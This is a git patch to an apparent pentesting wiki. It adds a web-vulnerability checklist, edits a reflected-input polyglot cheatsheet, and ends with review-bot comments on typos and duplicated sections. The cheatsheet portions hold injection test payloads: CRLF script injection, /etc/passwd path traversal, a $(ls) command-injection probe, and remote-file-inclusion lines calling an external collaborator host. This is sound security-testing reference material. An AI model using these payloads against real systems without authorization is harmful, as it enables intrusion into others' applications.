From 8a3bbdc0ecb0b59be5c4c08021f035cd06d7d718 Mon Sep 17 00:00:00 2001 From: CPol Date: Sat, 26 Jun 2021 12:03:36 +0000 Subject: [PATCH] GitBook: [master] 4 pages modified --- SUMMARY.md | 1 + pentesting-web/2fa-bypass.md | 2 +- .../pocs-and-polygloths-cheatsheet.md | 36 +++++- .../web-vulnerabilities-methodology.md | 121 ++++++++++++++++++ 4 files changed, 155 insertions(+), 5 deletions(-) create mode 100644 pentesting-web/web-vulnerabilities-methodology.md diff --git a/SUMMARY.md b/SUMMARY.md index abe3d3cf8..c02d0e305 100644 --- a/SUMMARY.md +++ b/SUMMARY.md @@ -336,6 +336,7 @@ ## Pentesting Web +* [Web Vulnerabilities Methodology](pentesting-web/web-vulnerabilities-methodology.md) * [Reflecting Techniques - PoCs and Polygloths CheatSheet](pentesting-web/pocs-and-polygloths-cheatsheet.md) * [2FA/OTP Bypass](pentesting-web/2fa-bypass.md) * [Abusing hop-by-hop headers](pentesting-web/abusing-hop-by-hop-headers.md) diff --git a/pentesting-web/2fa-bypass.md b/pentesting-web/2fa-bypass.md index 02ff4da37..24694cf8c 100644 --- a/pentesting-web/2fa-bypass.md +++ b/pentesting-web/2fa-bypass.md @@ -47,7 +47,7 @@ There is a rate limit but when you "resend the code" the same code is sent and t #### Client side rate limit bypass -[Read this post.](rate-limit-bypass.md) +{% page-ref page="rate-limit-bypass.md" %} #### Lack of rate limit in user's account diff --git a/pentesting-web/pocs-and-polygloths-cheatsheet.md b/pentesting-web/pocs-and-polygloths-cheatsheet.md index 5706ebdd7..c03215c96 100644 --- a/pentesting-web/pocs-and-polygloths-cheatsheet.md +++ b/pentesting-web/pocs-and-polygloths-cheatsheet.md 
@@ -3,6 +3,25 @@ The goal of these PoCs and Polygloths is to give the tester a fast **summary** of vulnerabilities he may exploit if his **input is somehow being reflected in the response**. You **won't find Content-Type dependant injections like XXE**, as usually you will try those yourself if you find a request sending xml data. You **won't also find database injections** here as even if some content might be reflected it depends heavily on the backend DB technology and structure. + + + + +* [ ] [**Client Side Template Injection**](client-side-template-injection-csti.md)\*\*\*\* +* [ ] \*\*\*\*[**Command Injection**](command-injection.md)\*\*\*\* +* [ ] \*\*\*\*[**CRLF**](crlf-0d-0a.md)\*\*\*\* +* [ ] \*\*\*\*[**Dangling Markup**](dangling-markup-html-scriptless-injection.md)\*\*\*\* +* [ ] [**File Inclusion/Path Traversal**](file-inclusion/)\*\*\*\* +* [ ] [**Open Redirect**](open-redirect.md)\*\*\*\* +* [ ] [**Server Side Inclusion/Edge Side Inclusion**](server-side-inclusion-edge-side-inclusion-injection.md)\*\*\*\* +* [ ] [**Server Side Request Forgery**](ssrf-server-side-request-forgery.md)\*\*\*\* +* [ ] [**Server Side Template Injection**](ssti-server-side-template-injection/)\*\*\*\* +* [ ] [**Reverse Tab Nabbing**](reverse-tab-nabbing.md)\*\*\*\* +* [ ] [**XSLT Server Side Injection**](xslt-server-side-injection-extensible-stylesheet-languaje-transformations.md)\*\*\*\* +* [ ] [**XSS**](xss-cross-site-scripting/)\*\*\*\* +* [ ] \*\*\*\*[**XSSI**](xssi-cross-site-script-inclusion.md)\*\*\*\* +* [ ] \*\*\*\*[**XS-Search**](xs-search.md)\*\*\*\* + ## Polygloths list ```python 
@@ -13,6 +32,7 @@ You **won't find Content-Type dependant injections like XXE**, as usually you wi %3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E %3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E %0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E +

THIS IS AND INJECTED TITLE

/etc/passwd ../../../../../../etc/hosts ..\..\..\..\..\..\etc/hosts @@ -92,6 +112,14 @@ $(ls) %0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E ``` +## Dangling Markup + +### Basic Tests + +```markup +

THIS IS AND INJECTED TITLE

+``` + ## [File Inclusion/Path Traversal](file-inclusion/) ### Basic Tests @@ -109,10 +137,6 @@ http://asdasdasdasd.burpcollab.com/mal.php \\asdasdasdasd.burpcollab.com/mal.php ``` -## [File Upload](file-upload/) - -{% page-ref page="file-upload/" %} - ## [Open Redirect](open-redirect.md) / [Server Side Request Forgery](ssrf-server-side-request-forgery.md) ### Basic Tests @@ -152,6 +176,10 @@ x=>alert(/C x=>alert(/Chrome%20XSS%20filter%20bypass/);> ``` +## [Server Side Request Forgery](ssrf-server-side-request-forgery.md) + +The same tests used for Open Redirect can be used here. + ## [Server Side Template Injection](ssti-server-side-template-injection/) ### Basic Tests diff --git a/pentesting-web/web-vulnerabilities-methodology.md b/pentesting-web/web-vulnerabilities-methodology.md new file mode 100644 index 000000000..57356d75e --- /dev/null +++ b/pentesting-web/web-vulnerabilities-methodology.md 
@@ -0,0 +1,121 @@ +# Web Vulnerabilities Methodology + +In every pentest web there is **several hidden and obvious places that might be vulnerable**. This post is meant to be a checklist to confirma that you have searched vulnerabilities in all the posible places. + +## Proxies + +{% hint style="info" %} +Nowadays **web** **applications** usually **uses** some kind of **intermediary** **proxies**, those may be \(ab\)used to exploit vulnerabilities. These vulnerabilities need a vulnerable proxy to be in place, but they usually also need some extra vulnerability in the backend. +{% endhint %} + +* [ ] [**Abusing hop-by-hop headers**](abusing-hop-by-hop-headers.md)\*\*\*\* +* [ ] \*\*\*\*[**Cache Poisoning/Cache Deception**](cache-deception.md)\*\*\*\* +* [ ] \*\*\*\*[**HTTP Request Smuggling**](http-request-smuggling.md)\*\*\*\* +* [ ] \*\*\*\*[**H2C Smuggling**](h2c-smuggling.md)\*\*\*\* +* [ ] \*\*\*\*[**Server Side Inclusion/Edge Side Inclusion**](server-side-inclusion-edge-side-inclusion-injection.md)\*\*\*\* +* [ ] \*\*\*\*[**XSLT Server Side Injection**](xslt-server-side-injection-extensible-stylesheet-languaje-transformations.md)\*\*\*\* + +## **User input** + +{% hint style="info" %} + Most of the web applications will **allow users to input some data that will be processed later.** +Depending on the structure of the data the server is expecting some vulnerabilities may or may not apply. +{% endhint %} + +### **Reflected Values** + +If the introduced data may somehow being reflected in the response, the page might be vulnerable to several issues. 
+ +* [ ] [**Client Side Template Injection**](client-side-template-injection-csti.md)\*\*\*\* +* [ ] \*\*\*\*[**Command Injection**](command-injection.md)\*\*\*\* +* [ ] \*\*\*\*[**CRLF**](crlf-0d-0a.md)\*\*\*\* +* [ ] \*\*\*\*[**Dangling Markup**](dangling-markup-html-scriptless-injection.md)\*\*\*\* +* [ ] [**File Inclusion/Path Traversal**](file-inclusion/)\*\*\*\* +* [ ] [**Open Redirect**](open-redirect.md)\*\*\*\* +* [ ] [**Server Side Inclusion/Edge Side Inclusion**](server-side-inclusion-edge-side-inclusion-injection.md)\*\*\*\* +* [ ] [**Server Side Request Forgery**](ssrf-server-side-request-forgery.md)\*\*\*\* +* [ ] [**Server Side Template Injection**](ssti-server-side-template-injection/)\*\*\*\* +* [ ] [**Reverse Tab Nabbing**](reverse-tab-nabbing.md)\*\*\*\* +* [ ] [**XSLT Server Side Injection**](xslt-server-side-injection-extensible-stylesheet-languaje-transformations.md)\*\*\*\* +* [ ] [**XSS**](xss-cross-site-scripting/)\*\*\*\* +* [ ] \*\*\*\*[**XSSI**](xssi-cross-site-script-inclusion.md)\*\*\*\* +* [ ] \*\*\*\*[**XS-Search**](xs-search.md)\*\*\*\* + +Some of the mentioned vulnerabilities requires special conditions, others just require the content to be reflected. You can find some interesting polygloths to test quickly the vulnerabilities in: + +{% page-ref page="pocs-and-polygloths-cheatsheet.md" %} + +### **Search functionalities** + +If the functionality may be used to search some kind of data inside the backend, maybe you can \(ab\)use it to search arbitrary data. 
+ +* [ ] [**File Inclusion/Path Traversal**](file-inclusion/)\*\*\*\* +* [ ] \*\*\*\*[**NoSQL Injection**](nosql-injection.md)\*\*\*\* +* [ ] \*\*\*\*[**LDAP Injection**](ldap-injection.md)\*\*\*\* +* [ ] [**ReDoS**](regular-expression-denial-of-service-redos.md) +* [ ] [**SQL Injection**](sql-injection/)\*\*\*\* +* [ ] [**XAPTH Injection**](xpath-injection.md)\*\*\*\* + +### **Forms, WebSockets and PostMsgs** + +When websocket, post message or a form allows user to perform actions vulnerabilities may arise. + +* [ ] [**Cross Site Request Forgery**](csrf-cross-site-request-forgery.md)\*\*\*\* +* [ ] [**Cross-site WebSocket hijacking \(CSWSH\)**](cross-site-websocket-hijacking-cswsh.md)\*\*\*\* +* [ ] \*\*\*\*[**PostMessage Vulnerabilities**](postmessage-vulnerabilities.md)\*\*\*\* + +### **HTTP Headers** + +Depending on the HTTP headers given by the web server some vulnerabilities might be present. + +* [ ] [**Clickjacking**](clickjacking.md)\*\*\*\* +* [ ] \*\*\*\*[**Content Security Policy bypass**](content-security-policy-csp-bypass.md)\*\*\*\* +* [ ] \*\*\*\*[**Cookies Hacking**](hacking-with-cookies.md)\*\*\*\* +* [ ] \*\*\*\*[**CORS - Misconfigurations & Bypass**](cors-bypass.md)\*\*\*\* + +### **Bypasses** + +There are several specific functionalities were some workarounds might be useful to bypass them + +* [ ] \*\*\*\*[**2FA/OPT Bypass**](2fa-bypass.md)\*\*\*\* +* [ ] \*\*\*\*[**Bypass Payment Process**](bypass-payment-process.md)\*\*\*\* +* [ ] \*\*\*\*[**Captcha Bypass**](captcha-bypass.md)\*\*\*\* +* [ ] \*\*\*\*[**Race Condition**](race-condition.md)\*\*\*\* +* [ ] \*\*\*\*[**Rate Limit Bypass**](rate-limit-bypass.md)\*\*\*\* +* [ ] \*\*\*\*[**Reset Forgotten Password Bypass**](reset-password.md)\*\*\*\* + +### **Structured objects / Specific functionalities** + +Some functionalities will require the **data to be structured on a very specific format** \(like a language serialized object or a XML\). 
Therefore, it's more easy to identify is the application might be vulnerable as it needs to be processing that kind of data. +Some **specific functionalities** my be also vulnerable if a **specific format of the input is used** \(like Email Header Injections\). + +* [ ] \*\*\*\*[**Deserialization**](deserialization/)\*\*\*\* +* [ ] \*\*\*\*[**Email Header Injection**](email-header-injection.md)\*\*\*\* +* [ ] \*\*\*\*[**JWT Vulnerabilities**](hacking-jwt-json-web-tokens.md)\*\*\*\* +* [ ] [**XML External Entity**](xxe-xee-xml-external-entity.md)\*\*\*\* + +### Files + +Functionalities that allow to upload files might be vulnerable to several issues. +Functionalities that generates files including user input might execute unexpected code. +Users that open files uploaded by users or automatically generated including user input might be compromised. + +* [ ] [**File Upload**](file-upload/)\*\*\*\* +* [ ] \*\*\*\*[**Formula Injection**](formula-injection.md)\*\*\*\* +* [ ] \*\*\*\*[**PDF Injection**](xss-cross-site-scripting/pdf-injection.md)\*\*\*\* +* [ ] \*\*\*\*[**Server Side XSS**](xss-cross-site-scripting/server-side-xss-dynamic-pdf.md)\*\*\*\* + +### **External Identity Management** + +* [ ] \*\*\*\*[**OAUTH to Account takeover**](oauth-to-account-takeover.md)\*\*\*\* +* [ ] \*\*\*\*[**SAML Attacks**](saml-attacks/)\*\*\*\* + +### **Other Helpful Vulnerabilities** + +This vulnerabilities might help to exploit other vulnerabilities. + +* [ ] [**Domain/Subdomain takeover**](domain-subdomain-takeover.md)\*\*\*\* +* [ ] \*\*\*\*[**IDOR**](idor.md)\*\*\*\* +* [ ] [**Parameter Pollution**](parameter-pollution.md)\*\*\*\* +* [ ] \*\*\*\*[**Unicode Normalization vulnerability**](unicode-normalization-vulnerability.md)\*\*\*\* +
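Review bot: in the `pocs-and-polygloths-cheatsheet.md` hunk at `@@ -3,6 +3,25 @@`, the `\*\*\*\*` sequences wrapped around most of the new checklist items (e.g. `* [ ] \*\*\*\*[**Command Injection**](command-injection.md)\*\*\*\*`) are GitBook export residue for empty bold spans and render as literal asterisks in other Markdown renderers; each item should read simply `* [ ] [**Command Injection**](command-injection.md)`. This list is also a verbatim copy of the "Reflected Values" checklist added in `web-vulnerabilities-methodology.md` in the same commit, so a `{% page-ref page="web-vulnerabilities-methodology.md" %}` here would avoid maintaining the same list in two places.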
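Review bot: in the `pocs-and-polygloths-cheatsheet.md` hunk at `@@ -13,6 +32,7 @@`, the visible title text of the newly added dangling-markup polyglot reads "THIS IS AND INJECTED TITLE"; "AND" should be "AN" so the marker string that a tester greps for in the response is spelled consistently.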
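Review bot: in the `pocs-and-polygloths-cheatsheet.md` hunk at `@@ -92,6 +112,14 @@`, the new heading `## Dangling Markup` is the only section heading in this file that does not link to its page, while the sibling headings do (`## [File Inclusion/Path Traversal](file-inclusion/)`, `## [Open Redirect](open-redirect.md) / ...`); it should be `## [Dangling Markup](dangling-markup-html-scriptless-injection.md)`, the same path the checklist at the top of the file already uses. The same "THIS IS AND INJECTED TITLE" typo ("AN") is repeated in this section's test payload.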
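Review bot: in the `pocs-and-polygloths-cheatsheet.md` hunk at `@@ -152,6 +176,10 @@`, the added `## [Server Side Request Forgery](ssrf-server-side-request-forgery.md)` section is redundant with the existing combined heading `## [Open Redirect](open-redirect.md) / [Server Side Request Forgery](ssrf-server-side-request-forgery.md)` earlier in the same file, which already lists the shared tests; either drop the new section or split the combined heading into separate Open Redirect and SSRF sections so SSRF appears exactly once.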
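Review bot: the new `pentesting-web/web-vulnerabilities-methodology.md` (hunk `@@ -0,0 +1,121 @@`) has several typos that should be fixed before merge, including two in link labels: `2FA/OPT Bypass` should be `2FA/OTP Bypass` (matching the `SUMMARY.md` entry for `2fa-bypass.md`) and `XAPTH Injection` should be `XPath Injection`. In the prose: "In every pentest web there is several" → "In every web pentest there are several"; "confirma" → "confirm"; "posible" → "possible"; "usually uses" → "usually use"; "may somehow being reflected" → "may somehow be reflected"; "requires special conditions" → "require special conditions"; "functionalities were some workarounds" → "where"; "it's more easy to identify is the application" → "it's easier to identify if the application"; "my be also vulnerable" → "may also be vulnerable"; "Functionalities that generates" → "generate"; "This vulnerabilities might help" → "These vulnerabilities might help". The `\*\*\*\*` escapes around the checklist items are the same empty-bold export residue as in the cheatsheet and should be removed throughout, and the "External Identity Management" section is the only one without a one-line intro like its siblings.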